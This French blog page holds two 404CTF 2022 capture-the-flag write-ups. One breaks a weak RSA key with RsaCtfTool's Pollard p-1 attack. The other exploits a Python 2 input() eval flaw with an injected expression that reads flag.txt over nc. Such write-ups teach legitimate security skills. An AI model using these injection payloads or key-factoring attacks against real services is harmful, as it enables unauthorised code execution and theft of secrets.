dimanche 11 septembre 2022

404CTF 2022 - Un RSA incassable?

 Bonjour Agent,

Nous avons appris que Hallebarde utilisait le chiffrement RSA pour communiquer! Nous avons pu intercepter un de leur message ci-dessous, ainsi que la clé publique utilisée. Selon nos experts qui sont passés avant, "Le module est trop gros, on ne peut rien faire". Pouvez-vous voir s'ils ont raté quelque chose?

Module: 264260849184973464982616810011189432725471679851535970549752992980013685427054130834600835230399904802462965456974947538318213223585436360002292504595152950137188712696208597449140460215140901426523911789537180980494972189978839047835537352914856104135490608512555869141766081593589643441958443651294711541856201978508340915671607277979591968248058399795168563294090427290234733756922544755667413890558324220843460177193246018531280862561066074120654752753002311679435459237771670352371010596105395795940209523309781850979927988566194373203050532192192865140293356042897510103979797577385050030819647066037181
Exposant: 65537
Message chiffré: 40110232492214007673187408092050413824057587648366839143339482691859337096033351102276645395275735274322548715598894335826499267358923539936373981416212599523632227239475760261528220077888121552688286380591552417803111794635687206274867498165659330678667435332328065173075710535404048653621228158847748005294255562046654937629633514846123655978199420228460405580305729253303227936760801772396770804796700223239015341586701669475537453700175448572495847377417335800300005252499067811919833639526361733535793115856365357616339193637149185654816751038389408567777725988888990153670326115611236718811592564298263

 

 Utilisation de l'outil RsaCtfTool.py

[serge@alien1 RsaCtfTool]$ ./RsaCtfTool.py -n 264260849184973464982616810011189432725471679851535970549752992980013685427054130834600835230399904802462965456974947538318213223585436360002292504595152950137188712696208597449140460215140901426523911789537180980494972189978839047835537352914856104135490608512555869141766081593589643441958443651294711541856201978508340915671607277979591968248058399795168563294090427290234733756922544755667413890558324220843460177193246018531280862561066074120654752753002311679435459237771670352371010596105395795940209523309781850979927988566194373203050532192192865140293356042897510103979797577385050030819647066037181 -e 65537 --uncipher 40110232492214007673187408092050413824057587648366839143339482691859337096033351102276645395275735274322548715598894335826499267358923539936373981416212599523632227239475760261528220077888121552688286380591552417803111794635687206274867498165659330678667435332328065173075710535404048653621228158847748005294255562046654937629633514846123655978199420228460405580305729253303227936760801772396770804796700223239015341586701669475537453700175448572495847377417335800300005252499067811919833639526361733535793115856365357616339193637149185654816751038389408567777725988888990153670326115611236718811592564298263
private argument is not set, the private key will not be displayed, even if recovered.

[*] Testing key /tmp/tmp2g84j7ke.
[*] Performing factordb attack on /tmp/tmp2g84j7ke.
[*] Performing fibonacci_gcd attack on /tmp/tmp2g84j7ke.
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 9999/9999 [00:00<00:00, 57796.94it/s]
[*] Performing mersenne_primes attack on /tmp/tmp2g84j7ke.
 29%|██████████████████████████████████████▊                                                                                             | 15/51 [00:00<00:00, 351477.99it/s]
[*] Performing nonRSA attack on /tmp/tmp2g84j7ke.
[*] Performing pastctfprimes attack on /tmp/tmp2g84j7ke.
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 113/113 [00:00<00:00, 395623.00it/s]
[*] Performing smallq attack on /tmp/tmp2g84j7ke.
[*] Performing system_primes_gcd attack on /tmp/tmp2g84j7ke.
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7007/7007 [00:00<00:00, 623808.46it/s]
[*] Performing SQUFOF attack on /tmp/tmp2g84j7ke.
[!] Timeout.
[*] Performing boneh_durfee attack on /tmp/tmp2g84j7ke.
Can't load boneh_durfee because sage binary is not installed
[*] Performing comfact_cn attack on /tmp/tmp2g84j7ke.
[*] Performing cube_root attack on /tmp/tmp2g84j7ke.
[*] Performing ecm2 attack on /tmp/tmp2g84j7ke.
Can't load ecm2 because sage binary is not installed
[*] Performing fermat attack on /tmp/tmp2g84j7ke.
[!] Timeout.
[*] Performing fermat_numbers_gcd attack on /tmp/tmp2g84j7ke.
  0%|▍                                                                                                                                   | 32/9999 [00:40<4:27:55,  1.61s/it][!] Timeout.
  0%|▍                                                                                                                                   | 32/9999 [01:00<5:11:35,  1.88s/it]
[*] Performing mersenne_pm1_gcd attack on /tmp/tmp2g84j7ke.
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2019/2019 [00:00<00:00, 52186.48it/s]
[*] Performing noveltyprimes attack on /tmp/tmp2g84j7ke.
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 21/21 [00:00<00:00, 350917.86it/s]
[*] Performing nsif attack on /tmp/tmp2g84j7ke.
[!] This attack module is not implemented yet
[*] Performing partial_q attack on /tmp/tmp2g84j7ke.
[*] Performing pisano_period attack on /tmp/tmp2g84j7ke.
[*] Performing pollard_p_1 attack on /tmp/tmp2g84j7ke.
  0%|                                                                                                                                                | 0/997 [00:00<?, ?it/s]
[*] Attack success with pollard_p_1 method !

Results for /tmp/tmp2g84j7ke:

Unciphered data :
HEX : 0x3430344354467b4634317433355f347474337431306e355f347633635f6c335f5235347d
INT (big endian) : 101384582033510951325010359008727680625145975108923307577800692180149739885949739152509
INT (little endian) : 243229796752028152224492264058909156536767078577809619383880856732613058918122043748404
utf-8 : 404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}
utf-16 : 〴䌴䙔䙻ㄴ㍴張琴㍴ㅴ渰張瘴挳江弳㕒紴
STR : b'404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}'
HEX : 0x1cef080c6aca11d510087d1904fa22f1d6b7e3a086626c067528d334657a8cde931afbebfe5e3a21816ee11872c5e26acb71b386604b1f7a42a387feebfc68448400f5a4240549dd7edf25ba2a77be137a3c5820e7e5c325213f7579b30c1a33bdccfd6936d30d8efa0aee1f16c4b4858f8f84f595d7fa251314efe156093c58f5d9bf0c4e136e92e8bba4680723e82c3f3bc10d722712d7ea8e74190f450eb272001b8921de10ebe4a07b8df3049be0f04d97e52bff11567ec5cf64e6c5f0b5b3aafdea9c33ca953da7e374f26d7f8b3cd4c58958e57a9f7d04583fb92a413a9858ee87cda06b6ae24c036095a4ddb0710c8d43672e7d475b8ab9cdd9
INT (big endian) : 217708548006851910315849173150271994279268584039079885155677818183091180895027383167525141949810589791105382222188577285217800357381609641168102408646043195655661274523284501713912520031841918535103804203888991787142416833841126461420016516353510194623228445682561220811787894718450341182944542560644468178628848076823028583243716286170054098608005410814722462513343159833060599560358689129610947325973893299015671729510879907449959904240894766297590151689371717383099568448591301771693276988455241760519569366403467235686286748652586551455279736971736485245890485885906528956377083873566739439773708526931417
INT (little endian) : 1638839175785204961693797130192832298317369592046399642512364704134266676970402456076476753764102990954059936231350278809554813452233699243618134282251372399286739006447548923044124872367918480339544944057249641983349672837280389764444545034465682414562452529369132601842521566435688559214511671763323602627228346394427882629177118483725687896182582936944911352469682493991294290374327417718387578208651978740134219704629741498792732894561004290384856717870407129518841987428710932065547801836061795771332876206597220813647886423546825261266060521028462765408357232751645605180294088221096624432161796792053532
STR : b'\x1c\xef\x08\x0cj\xca\x11\xd5\x10\x08}\x19\x04\xfa"\xf1\xd6\xb7\xe3\xa0\x86bl\x06u(\xd34ez\x8c\xde\x93\x1a\xfb\xeb\xfe^:!\x81n\xe1\x18r\xc5\xe2j\xcbq\xb3\x86`K\x1fzB\xa3\x87\xfe\xeb\xfchD\x84\x00\xf5\xa4$\x05I\xdd~\xdf%\xba*w\xbe\x13z<X \xe7\xe5\xc3%!?uy\xb3\x0c\x1a3\xbd\xcc\xfdi6\xd3\r\x8e\xfa\n\xee\x1f\x16\xc4\xb4\x85\x8f\x8f\x84\xf5\x95\xd7\xfa%\x13\x14\xef\xe1V\t<X\xf5\xd9\xbf\x0cN\x13n\x92\xe8\xbb\xa4h\x07#\xe8,?;\xc1\rr\'\x12\xd7\xea\x8et\x19\x0fE\x0e\xb2r\x00\x1b\x89!\xde\x10\xeb\xe4\xa0{\x8d\xf3\x04\x9b\xe0\xf0M\x97\xe5+\xff\x11V~\xc5\xcfd\xe6\xc5\xf0\xb5\xb3\xaa\xfd\xea\x9c3\xca\x95=\xa7\xe3t\xf2m\x7f\x8b<\xd4\xc5\x89X\xe5z\x9f}\x04X?\xb9*A:\x98X\xee\x87\xcd\xa0kj\xe2L\x03`\x95\xa4\xdd\xb0q\x0c\x8dCg.}G[\x8a\xb9\xcd\xd9'

 flag: 404CTF{F41t35_4tt3t10n5_4v3c_l3_R54}

Publié par à Aucun commentaire:

404CTF 2022 - python input injection

Python injection

Hallebarde a mis en place sa variante du Pierre-papier-ciseaux. À ce jour, personne de nos services n'est parvenu à vaincre l'ordinateur. Montrez-leur de quoi vous êtes capable en récupérant leur précieux flag.txt !

#!/usr/bin/python2.7 -u
# -*- coding: utf-8 -*-

choix = {1 : "pierre", 2 : "papier", 3 : "Hallebarde"}

def bonjour():
	print("Bienvenue sur pierre-papier-Hallebarde !")
	print("La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier")
	print("Pour jouer entrez un chiffre entre 1 et 3 : ")
	print("1 : pierre")
	print("2 : papier")
	print("3 : Hallebarde")

def jouer():
	choix_utilisateur = int(input("Choix ?\n> "))

	if choix_utilisateur == 1:
		choix_ordi = 2
	elif choix_utilisateur == 2:
		choix_ordi = 3
	elif choix_utilisateur == 3:
		choix_ordi = 1
	else:
		print("Choix invalide. Vous avez perdu")
		exit(1)

	print("Vous avez choisi : " + choix[choix_utilisateur] + ". L'ordinateur a choisi : " + choix[choix_ordi] +".")
	if decision(choix_utilisateur, choix_ordi) == 1:
		print("Vous avez gagné !!! Incroyable !")
		f = open("flag.txt", "r")
		print(f.readline())
		f.close()
	else :
		print("Vous avez perdu...")

def decision(joueur1, joueur2):

	if joueur1 == joueur2:
		return 2
	if joueur1 == 1 and joueur2 == 2:
		return 2
	if joueur1 == 1 and joueur2 == 3:
		return 1
	if joueur1 == 2 and joueur2 == 1:
		return 1
	if joueur1 == 2 and joueur2 == 3:
		return 2
	if joueur1 == 3 and joueur2 == 1:
		return 2
	if joueur1 == 3 and joueur2 == 2:
		return 1
	return 2

def main():
	bonjour()
	while True:
		jouer()


if __name__ == "__main__":
	main()

L'injection:

nc challenge.404ctf.fr 30806
Bienvenue sur pierre-papier-Hallebarde !
La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier
Pour jouer entrez un chiffre entre 1 et 3 : 
1 : pierre
2 : papier
3 : Hallebarde
Choix ?
> decision(choix.update({1:open("flag.txt", "r").readline()}),3)
Vous avez choisi : papier. L'ordinateur a choisi : Hallebarde.
Vous avez perdu...
Choix ?
> 1
Vous avez choisi : 404CTF{cH0iX_nUm3r0_4_v1c701r3}
. L'ordinateur a choisi : papier.
Vous avez perdu...
Choix ?

Flag: 404CTF{cH0iX_nUm3r0_4_v1c701r3}

Publié par à Aucun commentaire:
Inscription à : Articles (Atom)